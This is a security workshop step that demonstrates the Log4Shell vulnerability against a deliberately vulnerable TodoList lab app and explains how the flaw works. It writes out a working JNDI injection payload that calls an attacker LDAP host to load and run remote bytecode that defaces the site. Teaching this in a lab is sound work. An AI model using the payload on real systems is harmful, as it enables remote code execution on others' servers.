Step 7: Exploit a Vulnerable Open Source component

Exploiting an RCE vulnerability in the TodoList application.

The Goof repo TodoList application includes various exploits to demonstrate the risks of open source vulnerabilities. We’ll demonstrate the infamous Log4Shell vulnerability as an example of an extremenly profific open source package with a critical CVE that was relatively easy to exploit and gives malicous actors a remote code execution (RCE) vector of attack.

Open the website

This example is best exploited from your browser so open a tab and navigate to the todolist application’s loadbalancer address with /todolist appended to it. That hostname was stored in the TODOLIST_LB variable during a prior section so you can easily get a string for the URL by echoing it out like this:

echo $TODOLIST_LB/todolist

34.174.166.26/todolist

When you open that URL in your browser, you should see the ToDoList welcome page todolist-welcome-page

Log into the app

Click “Sign in” and log into the form with the following pre-populated user account:

todolist-login

Trigger the exploit

In the search field enter the following string ${jndi:ldap://ldap.darkweb:80/#Vandalize} and submit the search. todolist-search

Vandalized!

Immediately*, you can see that the header for the entire site has been modified to show a the hacker equivelent of graphiti! todolist-vandalized

* Sometimes the hacked header can take a few seconds to appear, if you don’t see the hacked page header immediately, try refreshing the page and/or navigating to another page in the app.

What? Why?

A full rundown of the Log4Shell issue is out of scope for this workshop but the high level description is:

  • This application is pulling in an older version of the log4j open source library
  • The log4j code (at that version) blindly interpolates the JNDI addresses and queries the network for remote values
  • Search queries are being logged by the application using log4j
  • When the interpolated ${jndi:ldap://ldap.darkweb:80/#Vandalize} string was encountered, log4j queried an LDAP server named ldap.darkweb to ask for something named “/#Vandalize”
  • ’ldap.darkweb’ is a malicous LDAP impersonator that recognized this request and interacted with log4j code in a way that caused malicuous Java bytecode to be returned and run in the JVM by log4j
  • That bytecode modified the header.jsp file in this webapp

The returned bytecode could have done far more mallicous things, not the least of which would be to open a remote, reverse shell into the container.

Catching and stoping this

In the next step we will look into ways to catch and fix vulnerabilities like this.